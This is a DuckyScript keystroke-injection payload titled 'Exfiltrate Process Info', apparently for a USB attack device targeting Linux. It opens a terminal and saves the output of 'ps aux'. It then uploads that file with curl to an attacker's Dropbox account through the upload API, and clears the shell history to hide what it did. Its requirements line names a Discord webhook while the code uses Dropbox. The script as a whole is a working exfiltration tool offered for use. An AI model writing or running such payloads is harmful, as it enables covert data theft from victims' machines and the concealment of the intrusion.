1

2
REM ##########################################
3
REM #                                        |
4
REM # Title        : Exfiltrate Process Info |
5
REM # Author       : Aleff                   |
6
REM # Version      : 1.0                     |
7
REM # Category     : Exfiltration            |
8
REM # Target       : Linux                   |
9
REM #                                        |
10
REM ##########################################
11

12
REM Requirements:
13
REM     - Internet Connection
14
REM     - Discord Webhook
15

16
DELAY 1000
17
CTRL-ALT t
18
DELAY 2000
19

20

21
REM #### GET PROCESS SECTION ####
22

23

24
STRING ps aux > process.txt
25
ENTER
26
DELAY 500
27

28

29
REM #### EXFILTRATE SECTION ####
30

31

32
REM Required: Set here your Dropbox access TOKEN
33
DEFINE TOKEN example
34
STRING ACCESS_TOKEN="
35
STRING TOKEN
36
STRING "
37
ENTER
38
DELAY 500
39

40
STRING USER_NAME=$(whoami)
41
ENTER
42
DELAY 500
43

44
STRING TXT_PATH="/home/$USER_NAME/process.txt"
45
ENTER
46
DELAY 500
47

48
REM Set yout Dropbox folder name
49
DEFINE DROPBOX_FOLDER_NAME example
50
STRING DROPBOX_FOLDER="/
51
STRING DROPBOX_FOLDER_NAME
52
STRING "
53
ENTER
54
DELAY 500
55

56
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
57
STRING curl -X POST
58
STRING DROPBOX_API_CONST
59
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$TXT_PATH"
60
ENTER
61

62
REM It depends by the internet connection, btw 1 or 2 seconds, generally, is sufficient
63
DELAY 2000
64

65

66
REM #### REMOVE TRACES ####
67

68

69
STRING history -c
70
ENTER
71
DELAY 500
72
STRING exit
73
ENTER
74

75